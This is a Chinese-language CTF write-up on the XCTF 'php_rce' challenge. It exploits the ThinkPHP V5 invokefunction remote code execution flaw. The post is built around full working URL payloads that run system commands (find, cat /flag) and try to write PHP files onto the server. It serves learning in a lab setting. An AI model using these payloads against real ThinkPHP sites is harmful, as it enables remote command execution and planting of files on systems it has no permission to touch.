攻防世界高手进阶区web之php_rce之wp

php_rce

 

 

 

 

查看源码,扫描目录,查过F12都没发现任何蛛丝马迹,所以只能去百度一下ThinkPHP V5 有什么漏洞!

 

 

 

转载这个大佬博客:https://www.cnblogs.com/backlion/p/10106676.html

里面有这个漏洞详细复现,使用里面的payload可以以出来

 

 

我们需要改一下payload:

http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20fla*

 

 

发现使用模糊搜索太多了,还是换个payload:

http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20flag

 

 查询flag:

http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

 

看大佬博客这里可以写入一句话,我们继续尝试:

payload:http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=%3C?php%20echo%20%27ok%27;?%3E

 

 

回显出来是18,也不知道是什么意思,继续查询这个test.php写到哪里了,因为这个目录摸不清,可以模糊搜寻!

payload:http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20test.php

 

 

查看写的内容:

http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20var/www/test.php

 

 

发现什么都没有,应该没写进去,换个姿势,再写:

payload:

http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%3C?php%20echo%20%271%27;?%3E%27%20%3E%3E1.php

 

 

没报错应该成功了,先查看这个路径在哪?

payload:

http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%201.php

 

 

 

 

接着查看一下:

payload:

http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/var/www/public/1.php

 

 

发现空空如也,那再去访问一下!

 

 

 

发现不行,哈哈哈。好吧还是不给哪后台的,嘻嘻嘻。

 

发现我找的路径有问题,我又重新看来一下:

payload:

http://111.198.29.45:35718/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%201.php

 

 

发现被实体花了!哈哈哈,知道怎么写就好了,拿不到,或者怎么绕过咱就不会了,继续努力吧!

 

posted @ 2020-03-28 13:08  空城-1  阅读(173)  评论(0)    收藏  举报